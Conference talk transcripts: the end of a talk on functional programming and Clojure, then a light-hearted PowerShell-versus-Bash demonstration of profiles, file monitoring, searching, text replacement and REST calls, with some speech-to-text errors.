Maybe all of us have gotten addicted to assignment and we're going to have to break that addiction. If these two Fs are executed on separate cores, it doesn't matter. So long as there's no state change. So I can take my function, the same function, executed on multiple cores. So long as there's no state change, I'll get the same results. This is why these languages have suddenly become important. Anybody noticed that these languages, you know, five years ago you didn't hear much about a functional language? Why have these languages become suddenly important and it's because of this multi-core problem? Everybody's trying to figure out how to solve the coming problem, the freight train that's on the tracks ready to run us all over. And out of this has come a number of languages. Some of them are old. These languages are very old. Airlang is becoming very popular now, functional language, but very interesting in the high reliability market. It's possible to write very high reliability functions in Airlang because they've got a very good recovery mechanism and it's a nice functional language. Who studied Airlang? This would be worthwhile. There's a couple of good books on Airlang. Just read the books, get an idea. Write a couple of lines of code and you'll see what's going on in this language. There's another language derived from Airlang called Elixir which makes Airlang look a little bit like Ruby. Who's a Ruby programmer here? Ooh, one guy. One guy. Wow. You guys are really convinced about.NET, aren't you? In the United States, a Ruby programmer can write a number on a piece of paper and find someone to pay him that number because all the social networking companies are using Ruby on Rails and they're all convinced that they've got to have good Ruby programmers so the market for Ruby programmers is going through the roof. That's a bubble. It's going to pop. I don't know when it'll pop but right now, if you're a Ruby programmer in the US, you feel pretty good. Who's doing a little F sharp? This is the.NET answer. A reasonably functional language. I'm not horribly familiar with it but I've looked at it a little bit. Slightly hybrid but you can do some functional code in it. Scala on the Java side, more of a hybrid language. What do I mean by a hybrid language? A hybrid language is a language that supports functional programming but allows you to do undisciplined assignment. If the language allows you to do undisciplined assignment, you can't really call it a functional language. I put closure down here in a special font because in a special color because closure is a language which is functional, it's essentially Lisp. Who knows Lisp? All right, some of you do. How many of you are afraid of all those parentheses? Yeah. Okay, so here's the thing about the parentheses in Lisp. You know a function called in Java looks like this or in.NET. It looks like that. You've got this name of the function, open parentheses, argument, close parentheses. That's how you write a function call. In Lisp, what you do is you take that open parentheses right there and you move it there and now you know Lisp. That's it. There's no extra parentheses, same number of parentheses. It's just that funny little positional move and it scares everybody to death. Then the convention of the Lisp programmers is to stack all the closing parentheses at the end of the line instead of putting them on separate lines like.NET and Java programmers do. But if you count them up, same number, no difference. That's the difference. Just move that parentheses like so. I like closure because it runs on the both the Java and the.NET stack. It sits on top of the CLR or the JVM. It's a very nice little Lispy language. There's some good conventions in it. It imposes strict discipline on assignment. It's possible to do assignment but you cannot do an assignment in closure unless you, in effect, open a transaction. An assignment statement in closure is treated like a database operation. You have to open up something like a transaction that can retry and then you can do your assignment. It detects collisions in threading space and it retries and makes sure that there's no threading problems. That's what a closure program looks like. It doesn't look that different from a Ruby program or a JavaScript program except, of course, for that open parentheses which scares everybody to death. If you were to take that open parentheses, just move it there or maybe there. It would look a lot better from your point of view. All I'm doing here is defining a function named accelerate all which takes an argument named OS and it calls the map function and maps the function accelerate to the list of objects. Pretty straightforward stuff. People like, this gets people crazy here. That's a function call right there. It's the greater than or equal operator and then the two arguments and everybody wants to move that into the middle and they can't quite manipulate it in their brains to move it in the middle. It takes a little practice. Here's how you add. That's a function, the plus function. We don't have operators in these languages. We just have functions but we can use special characters for the function names. That's a plus function, adds those two. This is the divide function. It takes that, divides it by that. It's not real hard to figure out. What about OO? OO is procedure plus state, right? State is evil in the functional world. Does that mean that when you're in your writing functional code you can't be doing OO? The answer to that is no. You can be doing OO in a functional program. You just can't manipulate state because remember that OO is exposed procedure but hidden state. Remember we were supposed to be hiding all of our state in an OO program. All the variables are supposed to be private. You're not supposed to know those variables exist. It's possible to write functional programs using an OO style and not only are you hiding all the variables, you're also not changing any of them. All of the objects become immutable. Now you may think to yourself, yeah, immutable. That means I got to make copies. Every time I change an object I got to make a copy of that object because I can't modify the state of the object and it turns out that these languages are actually very clever. The languages, the implementers of the languages understand that linked lists can have multiple heads and you can make a linked list look like two different lists by moving the pointer to two different heads. So you can modify a linked list without making a copy just by creating a different head and they use this technique to make it possible to modify objects without needing to make a copy. The old object is still there but it gets linked to the new version of the object by some very clever linked list manipulations which keeps the speed very high. In closure this is called persistent data structures when you modify a data structure you do not destroy the old version. You just keep a new version. That should sound familiar to you. That's your source code control system. You modify your source code but you don't destroy the old version and you have very clever ways inside your source code control system to make sure that you relink to the old source code if you want to. You can move back in time. They don't make copies of all that old source code. What they do is they're very cleverly store the differences in just the right way and they maintain the pointers so that you can reconstruct the source code at any time. That's what these persistent data structures do. Remember that OO is a lot more than just state. OO is dependency management. OO is about managing the dependencies inside of an application so that high level concepts are independent and low level concepts depend on high level concepts. This is called dependency inversion. That dependency inversion can still be done in functional programming. In an OO program we use polymorphism to do that. In a functional program we can still use polymorphism. There's no reason that you can't have a function and when you call that function it dispatches to different other sub-functions based on some kind of type identifier. All of that can still be done. And closure as a language allows that to be done as well as the others. Functional languages can still have polymorphic interfaces. They all still need dependency management. None of that stuff changes. They all still need the principles of object-oriented design and the principles of dependency management. But they need something else. They need the discipline imposed upon changes of state. So a language like closure has special functions in it. Transactional memory that allows you to change variables but only in the context of a transaction. This discipline has to be maintained if you're doing a closure program. There's no locking. You don't block for anything. You just make sure you've got this nice transactional memory. Because locking requires superpowers. It's difficult to know when to lock and when not. Has anybody debugged an application horribly? You want me to find out that you forgot to lock somewhere? Locking requires superpowers. Let's not use them. Locking means that you have side effects and you're trying to lock around those side effects. And with that I think I'm going to... I had a lot more to talk about. But... With five minutes left I think I'll open it up for questions. Are there any? You're going to have to holler and put your hand up really high because I can't see anybody. Yep. Memory is cheaper but what about cash misses? So we do have the problem now that we've got all this caching in our processors but the hardware guys are ripping all the caches out. All those caches are going to go away. All those hardware caches are going to go away. Now we still have software caches and yes the more memory we use in our lists and the more memory we use in our persistent data structures the more we're likely to have some issues there. Functional programs can be a little slower. Not much. A little bit slower because there's this funny linked list structures that you have to be walking through. But the kind of time difference is fairly small and if we're talking about multicore well then the time difference is almost irrelevant. Because we're trying to find a way to program with 1024 cores if that costs us 2% for each individual core it's not much of a cost. Anybody else? Do I see a hand somewhere? It's hard for me to see. Okay I don't see any hands. Oh oh oh one guy one guy. So the question is how do you structure your program because now I have nice objects that I can put my functions into. How do I structure it now? And the answer is the same way. You still have data structures. You still have gatherings of data and functions that operate on that gatherings of data. The difference is that you don't change any of the variables inside those gatherings of data. In a good functional language there is a way to create a suite of functions that operate on a particular kind of data structure. It looks like an OO language in that sense. Closure has that facility for example. You can create records and inside those records you can put functions and those records can behave polymorphically just like methods in classes except that none of the variables in the records can change. You have to create new objects even though you're not actually creating new objects. It looks to you like you're creating new objects and you can maintain state that way. Alright I think that's enough. Thank you all for your attention. I'll see you another time.
|
Why is functional programming becoming such a hot topic? Just what is functional programming anyway? And when am I going to have to know about it? In this talk Uncle Bob will walk you through the rationale that is driving the current push towards functional programming. He'll also introduce you to the basics by walking through some simple Clojure code.
|
10.5446/50863 (DOI)
|
Is it working? Yes, I think it's mine, it's working as well. All right, good. All right, let's start. Welcome, welcome, Amaran. And as you know, we're going to have a battle, and so there will be things, there will be blood, there will be swearing, no, we won't. We'll try to be nice, at least a little bit in the beginning. Do you want to start? We can start, and then we can switch. Sure. So, I will be representing PowerShell, and this is my name, and I'm working with Foshe, and I've been a PowerShell enthusiast for quite a while. It's called Addict. Addict, PowerShell user, whatever. Once you get into it, it's hard to stop from there. Good, all right. All right, so, and you should probably say... I'll do that, just could you... We have this fancy thing, we have to push the button. Yeah, now it's my turn. So, this is me. I'm going to be representing Bash, and while I have to say, I have been addicted to Bash for, I don't know, over 10 years, 15 years probably, so, yeah, well, and I work at Compitose, and I'm going to try to show you some cool stuff about Bash today. So, there is one thing. We need your votes. We really need your votes. We need your tweets. So, basically, what you have to do is, what's there, you just say, and this here, slow, and then you say Bash, or... PowerShell. PowerShell, and whatever you want. So, basically, we're going to be looking for those two hashtags. Why you'll see later on, and how. All right, I'll switch over here, so you can quickly take a look at the PowerShell tag. This is what you want to vote, of course, and vote smart, vote for PowerShell. No. So, are you guys ready? Yay! Come on. All right. And then we kind of thought that this kind of battle, it has to be like, kind of, you know, within real, like, battle traditions, so we should kind of present in, like, in the left corner, there is a Herald, representing PowerShell. Yes. And in the right corner, representing Bash. It's me, Rustam. Yay! Thank you. All right. Let's kick things off. So, I'm going to go ahead and start, because I already have the computer online here. Perfect. Let's see. You start. I'll show the good parts. Do the duplicate screen thing here first. So, all right. This is a nice little Windows screen. Oh, and the foils. Okay. So, I'm going to go ahead and start PowerShell. Ice. And I'm going to render that admin, because I want all the privileges I can get. So, ah. Your shell is ugly, and it looks like MS-GOS. Well, since there are microphones, I'm going to repeat that. Totally. I mean, no, no, like, I have nothing to do with that. I'll just repeat it. He just said that his shell is ugly, and it looks like DOS. Yeah, well. That's for the record. Well, at least I can change it quite easily, compared to what you can do in Bash. I mean, I can just change the colors here. Yeah, but you need to. He can change it to black and white. So, it looks like DOS. Basically, I have all the options I need. So, I can change it from not looking like DOS. Anyways, so, I'm just going to kick everything off. So, I'm just going to go ahead and say, do awesome. And we can just admire the power of the shell. It's good. It's so wonderful, isn't it? So, this is a little memory stream that's actually writing to the system beep. The nerd factor of this talk, just skyrocketed. What do you got in Bash? Well, I mean, now we know who the dark side is, right? So, I'm going to go for safe stuff, and just like with kittens and animals and stuff like that, right? So, I'm going to show you some, wait a second. I'm going to show you something really nice. Can you see the, oh, you can't. Good. That's a yelp. It's another feature of Microsoft Windows. It kind of switches this stuff for you. That's the Linux yellow screen of death, almost. Yeah, well, it's nice, you know. Let's see. Can we... Technical. We have some technical difficulties. We go for duplicate. It's a power point changing the screens and stuff. So, I have something really nice. I have something like that. Welcome to NDC. Oh, isn't it nice? Isn't it cute? Yeah. Yeah. It's pretty cool. It's the light side. It's the dark side has cookies. We don't. We have cows and stuff. Yeah. And kittens. All right. So, what? Do you want me to show you something? Something more awesome, I mean. Okay. Let me start you showing you some cool stuff. And in this shell, let me just go to... What was that? What happened? Something is wrong. Something is wrong. Something kind of looks weird. It looks like a kernel panic. Oh, wait. That wasn't... Wait, PowerShell rocks? Come on, dude. We're in presentation. It looks like you're already completed. I mean... Come on. I trust you not to do that kind of stuff. I don't know. I'm innocent. Yeah, right. You're innocent. I kind of don't believe that. I mean, my computer wouldn't do that kind of things. Of course it would. Yeah, right. Okay. Well, okay. Let's see. Well, I mean, the thing is that... Let me just fix it. His screw up a little bit. I don't know what you're talking about. Well, he's still... Yeah, right. Yeah, okay. Well, you know, let's start with the profiles. Since we're there, just let me show you just a little bit of profiles and stuff and see how actually that kind of things could be done. We have... In Bash, you have profiles which are... There are like different places and there is one main one which is at... It's at... Can you see or should I increase the font? I can do that. I can do this and I can actually go full screen on this. It looks so much cooler. Is it better now? More? Like this? All right. Let me show you. Oh, let's go for like... The main one, the main profiles thing is here. Oh, wait. It's in... Oh, it's in here. Profile. So this is kind of the main thing that's for all users and stuff and then where you can define things, you can define your own variables and it kind of gives you the flexibility of adding your own functions, your own stuff. We'll look at more what kind of stuff later, but basically this is kind of lets you create shortcuts for your things, the things you type, the things you type more often. And there is also a local version of that which is for your user which is there, which is kind of your own customizations for just that user that is logged in and then you see I have my own customizations and stuff added there which I kind of going to use for later on. That thing is placed, it's at your home slash your user name. I have a fantastic user name. I'm really proud of it, by the way. It can get really critical. It can get really scary sometimes. I did type it a couple of times instead of the login window, I tucked it in the shell. I stopped in time so no harm is done, but yeah, it kind of could be a little bit different. Another cool thing, I mean what you can do, what you can put in those profiles is functions. So you can actually create like a easy tiny little function like, well, the example I usually like to show is the one like how often do we like say CD to something and then go to CD to something else and then you take LS there to see what's inside, right? What you could do is to create a function called CDL that would do both things at the same time, right? So then you can just do like this and then you say I want to go to CD to something which is, and that something is the first parameter that the function gets. And then you can say like LS minus, I don't know, LA, something like that just to see the contents of it. And then you can just go like CDL and NDC battle. It will do both things. So you go there and show the stuff. What do you get? Do you have some kind of stuff like that? Yeah, definitely. Show something cool and powerful. Okay, so if you took a mental note of the function in bash, it's really ugly. It's really ugly. I mean, you're passing parameters with a dollar sign. So in the PowerShell, I could just do a function, do something, and I could pass a name parameter. And then I'm actually able to use this for later. So I could say do something and then get auto completion. So it's pretty neat. It actually helps me to write better functions. Well, you have auto completion in bash as well. It's called tab. But it's not as pretty. So, he spoke a little bit about profiles. And the thing that just happened to your shell couldn't happen to mine because basically, I could set up a monitor to listen for events on my profiles. So PowerShell has the same concept of profiles. They're just stored more centralized. So basically, we have a variable called profile. There's just one one up. No. Oh, no, there's multiple profiles. But here it's all grouped together so you can have a profile for all users, all different hosts. You can have one for the current user, all hosts, and you can have for different variants of that. It's actually cool. It's a so you don't have to remember any paths in particular. You can also print them if you want. So I'm just going to go ahead and show you my profile. I'm going to say current user, current all hosts because I have something in this file. So basically here, I've set up a customized profile and I've added some neat little tricks like new item. I've added a default parameter. So every time I'm trying to create an item, I don't have to type dash item type file every time. I can just say new item and then it creates a file for me. So it's just small details that makes life a little bit more easy. But for the monitoring part, PowerShell has a really fancy way of registering events and listening to events. And since you're already based on the full.NET stack, you can basically use any component you want. So what I did, oh, I've done this earlier some many times because it's quite useful in many projects. Let's see, I'm going to go ahead and grab one of my scripts. Is it big enough? It's readable. I can probably make it a little bit smaller if I can read it. A little bit smaller, yeah, I guess that should be fine. So basically I've made a function to watch for changes and this one takes either a directory or a file. And there's some logics, there's some if sentences, which is quite readable compared to what bash is. You're right. But basically what this does is creates a file system launcher and it registers for the events and then it pushes them. So every time a file changes, I'm actually sending an email. Okay. So if I wanted to use the script, I could basically just say, what register, what did we call it? I have up here it's watch changes. So I could say watch changes, path, profile. Yeah, let's do it. Current user, all hosts. And let's save this and run this. And you can see it's writing some debug info because I put debug preferences on. And if I now try to change my profile, just say save, it's sending me an email. So it's pretty. So I can't actually pay you back, right? That's what you're telling me. Yeah, pretty much. At least I'll know you changed something. Oh, interesting, interesting. You know, I think I have to, I have to, I have to tell something. I kind of didn't want to tell you earlier today, just in a couple of minutes ago. But I don't know if you guys were like quick, fast enough to see what's what's in that folder. There is a tiny little file. It's green. Not cuckoo cloth. That's something else I'll show you later. But it's also green. You do feel the team like green, green papers, green, lots of green, right? Well, okay. Anyway, the thing I didn't tell you is that I have a tiny little script. Let's have a look at it. I have it open over here. So what do I have here? I think it's pretty much the same. Well, actually, it's a little bit better than what you had. Really? Yeah, I think so. Well, the thing is that we start with like, I notify weight, which is pretty much the same thing that would actually go and go ahead and look for different events for a file. And then what I did is that I said that it should listen all the time, M, and then event type is a close write. So you close the file and you write to it. And then I add some just for fun. I just added some formatted the timestamps and everything and just things like that. So you can actually basically ignore what says in format and time format. And then I say which folder it should look for and should actually monitor. And well, it just goes on, right? And then it says, like, every time something happens, it would just kick an event. And then something fun happens. One thing is just echo stuff and puts in blah, blah, blah. But I really like this slide. Do any of you guys know what Streamer does? Well, you kind of could probably guess. It actually takes control of my webcam and takes a screenshot. So actually, I mean, I'm just not sending only email. I'm actually taking the picture of the guy. So let's see actually. I think I have a picture here called intruder JPEG. So who is that again, huh? It must be manipulated. It must be Photoshopped, right? Yeah, of course. All right, let's go with that. All right. Well, even pictures doesn't help. Well, okay, I'll try to think of something cool for the next time. But anyway, I mean, just if we could just go through the rest of it, it just basically does. It takes a picture. Then it encodes it to make it like email friendly. And then it types like your file has been changed, blah, blah, and say which file and so on, and sends an email saying like your profile has been changed, and it would send to my email. So now I'm probably going to get a lot of spam. It wasn't supposed to be my real email, but anyway, well, be nice, guys. Anyway, so that's kind of it. So monitoring is a good thing. And like when you put the joke aside, it's actually has some useful stuff to it. I mean, what you could do with monitoring, the thing we showed in both PowerShell and Bash, is that you can use that kind of commands, not just for that kind of fun, like monitoring your BashRC file or profiles or whatever. If you can actually use it for logging for something like you have a tiny system that, and you don't want to have full scale logging some environment that would just do like crazy stuff and monitor the heck out of it, you just have tiny little watcher that would actually go and watch through the log file. It would just look at the contents like all the time and look for a special kind of exception, which is really bad and really critical, and would just send an email or something. So you can actually do something useful stuff to that. And that's what we're going to do. We're going to show you through this kind of over presentation through this battle. We're going to show you, first going to show you some fun stuff, and then we're going to kind of try to see and to turn it around and show you actually the useful, how useful it actually can be in your everyday life. And then you can decide what you feel is the best way to do it. I mean, if you're stuck on Windows, why do you want to use Bash? Because you have SIGVAN. Because you can. You have Bash from Linux. No, I don't like that. I kind of reject that. Alright. So monitoring one folder for changes is quite useful. So if you want to parse logs, you want to listen for errors, or maybe you have a system that ships a lot of files into one folder. You might want to ship them somewhere. It can be useful in many, many scenarios. Yes, it is. It is really good. It is actually very good stuff. The other good stuff that could be useful for, actually, you can use it together with that, is actually looking for, it's like searching for files. I mean, that's kind of thing that you do quite often. I mean, I'm sitting on a Linux box, like on a server, whenever I have to build something or something, and then something goes wrong or whatever, and I have to search for the file, and I have to find that, and I have to look for contents in it. And let's just show you really, real quick. I mean, we don't have that much probably time, but let's just show you real quick how you can search for files, and then look for stuff and replace them just on the fly. You want to start? Now you can go ahead. Okay, I can. Alright, since I have the machine, let's do this. Oh, it's fantastic. It's awesome. It's like sparkly unicorns all the way. Yeah, we don't like sparkly unicorns. And you don't like them. The rest of the people like, right? How many like sparkly unicorns? Yay! It's not so many. And kittens. Kittens is important, right? Yeah. Alright, let's see. Let's see for something like searching for files. There is a really, really, really powerful command that's called find. I want to show you one thing. It's manual pages. If you want to see what command does, what kind of description it has, whatever. The documentation of that thing, just go there. And man page for find is horrendous. I mean, it's really long. It's like it's miles long, and it has lots and lots of functions, and it does lots of crazy stuff. So if you don't know how to use it, if you're not really familiar with that, do that, check it out, and see how it actually powerful it is. And it's quick, actually, too. It's really quick. So simple stuff would be like saying something like find catalog, which is like here. And I would say give me something that has name into there something. Let's see if it works. Yeah, it does. So I just looked through it through the folder, and then I look for intruder file. I have also copied, both of us have this folder, this scary folder, it's one gig of log files and XML files, which we kind of use for benchmarking stuff. I kind of ripped it from Microsoft program files and Windows files. Just basically parsing all the logs and XMLs. So it's kind of artificially made folder. Yeah, so it's quite the neat little directory structure just to have a demo. So you can basically what you can do is like config and then look for something that contains stars with web. Oh, that would be a lot probably. Like this, I guess. Yeah, just a web star. Yeah, look, it went through like a gig of files like this and just found everything and show you the path and everything. What you can do, you can actually, if you want to look for something inside those files, you can actually use some stuff like grep. This is the simplest way to do that. Minus r just would go recursively. And then we can say, well, I don't know, let's go for web config. Well, we probably lost. Yeah, it did. Looked like an error. No, just the red one is just the hit. So, yeah, this is simple stuff, right? That's the easy stuff. Can you do that? I mean, this is basic stuff that you would probably have to do every day, at least like quite often, right, for some automation. So show us some partial magic. How can you do that kind of stuff? I mean, let's start easy, right? Sure, let's just give people some base start. Yeah. So as in Bash, you have basically the same functionality here, but instead of using something like find, we have an easier way. So you can always, yeah. So for the people that use the Bash, you have ls, right? Basically in PowerShell, ls is an alias to get child item. And this is a really, really powerful command blitz. So we can say get child item. We can say recurs. Let's see. Let's go to the right folder first, so we'll have some demos, configs. That's a good folder, yeah. So basically we have lots of stuff in here. So I could, whoop, not use find, influenced by Bash here. I could say. That's a good thing. That's a good thing. I like that. You're coming over to the light side, like the light side. List items, get them recursively. I will filter and I could say, yeah, just give me the XML files in all the subfolders. And it scans all the different folders and returns them to me. Takes forever. Well, I did all the XML files, you matched for web configs. Still takes forever. I know. Okay, so let me just throw this in a variable. Let's see, web configs. Let's see if there is any. Web configs. There's a queue. Like a seven or eight or something. Yeah. That path is fast because there's not that many files. But what is really cool here is that actually everything that is returned is an object. So I can use this for my advantage. Here I have properties. These are all full files, system, all file info objects. So they have a full name. So you can see the path. They have the directory name. Let's see. They have the directory, get directories, create subdirectories. And basically you can access whatever you want from the file info object. That's quite useful. Let's find another file. We have the web config in here for replacing. Well, let's do the bash equivalent. We could say cats. So give me the content of web config. And it prints on screen. This can be used with a pipe. Just as in bash. So I can say for each object, I can show you the equivalent proper command for each object. Or we have an alias saying percentage. Let me just go ahead and replace every instance of the string. I'm going to replace service bus, for instance, as I can see here with NDC. Let's see if we got that right. That's interesting. Replace. That's cool. And as you see, the output is now replaced. Perfect. So this is unstructured data manipulation in any file. This can be extended. So I could replace multiple lines. So if I wanted to continue, I could escape this one. And I can use dash replace again. And I could continue replacing it. So here I could replace service bus. And then I could replace emulated and just keep on going to replace multiple keywords. So this is, like I said, unstructured formatting like in bash. But we have something also really, really cool, which is very powerful. So if we wanted structured data, I could say data. XML.config. Now I actually have an XML document. So I could get the members here. And here I have the complete DOM structure or XML document structure. So you can manipulate all the nodes and you can actually invoke the data. Let's see, data. Save method. Which takes a file name or a stream. So basically you can manipulate XML files structured really, really fast. So it's pretty neat. That's actually a pretty cool thing, actually. I have to admit. The difference is, the main difference you'll probably see here is that... PowerShell, I mean, everything is objects. It's like you can access things with dots. And then you can just say. something,. something. In bash, everything is text. So everything is a text. Your touchpad interface, your network card interface, everything is a text. Stream of text going back and forth. And then what you can do is pretty much the same thing, but you can't use this. thing. You have to. It's a different, it has something to do with the way of bash was built. And then it has the idea of spreading the responsibility, spreading stuff between small commands. Instead of putting everything in one thing and like shipping something with batteries included, it would just give you lots of pieces and says like, look, this, everything works. You can just put together the way you want and it will work and do whatever you want. So that's the kind of main difference that you will actually see through the whole presentation. It gives you more manual work as well. If you need to install third-party, a lot of third-party things or configure them. I mean, sometimes, but sometimes, I mean, you don't want to do your computer make food for you as well when you come home. So it's like, you know, sometimes you do. Sometimes I kind of wish that. Could you switch the thing? Yeah, sure. I'll just show you a real quick one more thing just with the replacing stuff. It's really simple way. But as I told you, everything is streams. Everything is text in Linux. So then you have a stream editor, which is called said that would do all the replacing for you. So what you can do is saying like something like, I'm not going to explain that much about the options and stuff. Just have a look at the man page if you want, I mean, or just ask or something. I mean, it's pretty easy. I mean, it's like self-documented. It's self-documented. It's like I and E and off of the alphabet. It's cool. So what you're going to do is they say that you use stream editor to say that you replace something. As for substitute, and then you have this string, my string. Or actually, let's see. You are my grandfather. Oh, nice. It talks. Yeah, PowerShell talks. PowerShell talks. You can do, you can make it make it. I still have my call. Yeah, it's really nice. But does it talk? It does. I have, I'll actually show you. It should be somewhere here. No, not it. It's supposed to say this. I have a tiny little dinosaur saying hello or oops. Kind of cute, right? Still, I'm not still going for your dark theme. I'm still giving it cool and like stuff nice and dinosaurs with hats and stuff. Okay, go back to set. Minus something, you would just go like substitute, internet with interwebs, right? Something like that. And then you want to be it like this. And then you say go through all XML files. And wait. I did something wrong. Let's see. It's probably a magic command. It's probably this. Why it's not working. Let's see. So in PowerShell you'd had really easy, complete. Like this. This stuff, that's what I used. I'm going to explain why I used that. I wanted to do this kind of stuff for some HTML files that I'm going to use later. And I wanted to replace that. That's what I used. And that works. But it just says that it's not directory because I think because it is set to, it doesn't like that there are directories there. But that's all right. Let's just move on. And it's actually pretty cool. But it's pretty much the same. The only thing that you might see the difference is the performance. It's the way it works and how fast. And Bash probably is a little bit faster since stuff are a bit more optimized. Can we time that? We can time that. We can actually do that. Let's check it out. But I mean, I'm not really sure about the time. So we can, can you just show real quick how you do that? Because that's kind of, this is kind of a good thing. Let me show you how you do it in Linux. You just do this. And let's see. I have a curl request somewhere here. Curl. Yeah, like this stuff. Let's see. Curl. Oh, good. It was good this year. Curl. This is an example that we're going to be using a little bit further on in the talk. But this is basically something that sends requests, gets adjacent, and parses it in like nice way. So if you want, if I want to see how long time it will take, I will just say time. And it would just give me a statistics how much it took time for kernel time. Yeah, let's look real time. It took me three, three point seven seconds. User and sys. It's like it's how much time it takes in a user user side or system side, which is like system size. That basically kernel time. Sir. Show the same. Show how it works. Let's see. I'm just going to go ahead and switch. Let's see. Clear. And there. So basically here I can use measure command in PowerShell. So measure command just gives you all the data you want for a command. So now I just did the one I did earlier by filtering and getting all the XML files from the catalog. And measuring command, it just gives me how long it took. Seconds, milliseconds, takes, whatever. Yeah. Pretty much the same then. So we could pretty much monitor which one that was. That's good. It's not sufficient, but we would need hardware I guess. We probably need similar hardware and stuff like that. Mine is so much cooler. Yeah, sure. My surface. Sure, sure. So basically another cool feature here is if I wanted to do like 10 of these and measure the exact same commands and getting an average, I could just pipe them all through and I could do pipe to measure commands and I could say, hey, let's measure the objects. Well, measure objects. Property, I could say average property and I could say takes. Let's see. Yeah. It will take a while. Let's just do four of them, three of them. Five. So basically now I just iterated the expression three times and I've calculated the average property of the ticks. It's quite neat. Awesome. All right. So also for searching files in PowerShell, you have a really nice filter called where object. So we could easily filter, say, give me the files again here. Let's just store these in a variable. So if you want to do the same thing, you would use define for just with a bunch of options and it would do pretty much the same thing. But again, it won't be like objects.something, something, but it would be just options, bunch of options. So this is quite readable. If I say where objects and I could say, go ahead, give me all the XML files, which has file length greater than a thousand. Then it will give me all the XML files that is a certain size. So it's quite neat. That's cool. Looks good. I mean, again, pretty much the same, just a little bit different approach. But yeah. All right. All right. So have you guys tweeted yet? I hope you did. Because the next thing, I mean, it's like since I was talking about interwebs, we're going to go into interwebs and we're going to do some magic stuff on the interwebs. Yep. And show us, show us some cool stuff. Show us what we did. So the intention of making you guys tweet is to see what you guys like the most. If you like PowerShell or if you like Bash and try to get a score. It's not too late to work on it. Just have some sense of battle, I mean. Just tweet. So basically, here in PowerShell, I just wrapped up third-party DLL just to make the O-Wall authentication much easier for me. So basically, I could do this manually, but it's a hassle. So I took a DLL, just imported it, and I set up a Twitter app. And I made some nice little wrappers so I can just do searching, searches for stuff. I can do search next. I can do check if it has more results or not. I'm not sure if you're familiar with the Twitter API. I could also post updates. So I could say, post. Oh, let's include this file. Post update text. Alt status. And easy as low. Let's give me one point. I want another point. So I posted an update so you can get the entire structure from here. But let's get the score. I made a little wrapper saying, search for it in the Z-A-Low PowerShell. And basically, my script now just searches for seven days past and you see it didn't start seven days ago, so it should be fine. And? Unless I invented Time Machine. I'm not too sure about that yet. So there's six counts tweeting our criteria now, which is an easy as low PowerShell. Interesting. If we just, let's try to find your score. Let's rerun it. 11 counts. Come on, guys. Come on. More PowerShell. Awesome, guys. Thank you. Thank you. Thank you so much. Let's wrap it up. I could get the results of who's actually doing it. So we could do some real warfare here. Let's see. I could, let's see. I could get these out, out grid view. See? Ah, here we get the structure. Nice. Nice. So I'm watching you guys. It's really fancy. User interface, of course. Right? Yeah, yeah, definitely. Windows. Yeah, perfect. All right. Anyway, let me just show you real quick because before we go move on. Can you do this in Bash, I mean? Yeah, I can do that. That's what I wanted to show you real quick. I mean, it's like, we're kind of talking too much. But the thing is that, are we on? Yes, perfect. I want to show you something interesting. I mean, it just, I'm not going to show you the whole thing, but I'm going to show you that it's possible to do the same thing. I mean, since it's battle, we kind of have to show that things could or can't be done. So I have a library that I just downloaded from internet. There was another guy that wrote that for us. Let's see. Actually, I want to open it in editor. Then I can say like home. I should replace all your editors. User name. Yeah, sure. That's all right. As long as it's not like Visual Studio or something, I'm cool. Let me see. The cool stuff is that there is like a wout and stream wout authentication and everything. And it's actually, it works. Let's have a look at Twitter. There we go. So pretty much the same. I mean, it's like it looks a bit, maybe a little bit more scary. It could be. I have to admit that. But it actually works and you can do that kind of stuff. You can do, you can use your actual shell to run like authentication and go into and run and get the stuff from internet from the rest from soap from whatever. And it's actually pretty cool. I mean, it's like, it's not just like your Java code or dot net or C sharp or whatever code that would actually do that is able to do that. You can actually use your shell. And another thing is that, I mean, you see, I mean, I'm running here virtually on a virtual Ubuntu box, but I mean, what you could do the same thing. I mean, pretty much, I mean, most of the same things you could do in SIGGVN, which is like Windows Brother or Step Brother or whatever off a Bash shell. So SIGGVN would be like, Pash would be on Linux. I mean, it's not fully functional. No, it's not fully functional, but you will get most of the things. I mean, it's way better than DOS anyway. I mean, like, common line. Nobody uses DOS anyway. Well, nobody. I really hope you don't guys use it really. Even though you think it looks like DOS. Oh, it does. Still does. All right. Okay. Let's let's move on from like joy and fun of web services of Twitter and stuff like that. Let's move on into a little bit more kind of work related stuff that would, again, something a bit more serious, right? Something you can actually use in your everyday life. Something you can actually use in your everyday life every time you have to do something. So what you can do is you can, I showed you already kind of, you got the sneak peek of that you can use. We have most of the companies. I mean, it's like, we do that. I guess you guys do that. We use for issue tracking. We use stuff like Jira or something like that. And most of those would have a rest user, rest interface, right? So what we did actually was to, we took a random Jira site that was actually hosted by the makers of the Jira, Plasio guys. They had the demo site up. So we took that we, which is, I made a variable so I don't have to type all that thing all the time. So what we did is, which is that's URL. And we get the project demo project of that thing. We just get the rest and show you all the issues for that project. And then you can do stuff with it. You can, like, get the creators, get dates, get status, get whatever. So you'd start kind of your imagination that kind of stops you from doing all the cool and awesome stuff in the common line. So what I do is like to say curl this, this one, this again, look, in partial, you would probably do that with like included stuff. There would be a function that would do that for you and show it and everything. In bash, you actually split it. And then you say, like, okay, curl would just return me the output. And then I can pipe that thing that dash there, that kind of this vertical thing is pipe. You pipe it, you just send the output into another program, which in this case I use Python. I always use, like, look for excuse to use Python. So I did that, of course. So basically what it does, it just prints it in a nice way. What you can do that you can do more with the Python stuff, you can actually, yeah, like this. And then you can do, like, let's see, I have some more stuff here. Curl like this. I do a bit more. I just import some stuff, just what I need for JSON. And I print issues. I look for tag, JSON tag issues. And I would just print all of them and they would just list them. There will be probably a lot of them now. But you can do all that kind of stuff. Yeah, you see it just outputs every old text and then you can look inside and everything is objects. And Python, everything is objects. Then you can actually traverse and do magic and do stuff and do whatever actually you want to do with that. Show us some of the same kind of stuff in PowerShell. Sure. So in PowerShell you don't need external libraries in the same way. No. As long as you have the correct PowerShell version, there's a lot of neat little help features for you that does that. I just wrapped the show score from earlier. So now we can actually search for both. At the same time? At the same time. So now we're equal. There's a 13 count on each. So we're even. All right. I think you fixed it. No, no. We can show who's tweeting afterwards. All right. All right, let's go back to the G-Rack example. Okay, let's go. So basically, in PowerShell you have a nice little commandlet called invoke web requests or you can invoke REST method. Bash guys, you have to tweet more. Sorry, you were saying? I'm just going to scroll up here to the tweets. There we are. Remember to tweet. So invoke REST method. It basically just invokes a regular REST method and it serializes your data. So I can say g-raw URL. I just wrapped the demo URL here. I'm going to say data and invoke the REST method. It's the same URL, right? And then you can see it's actually 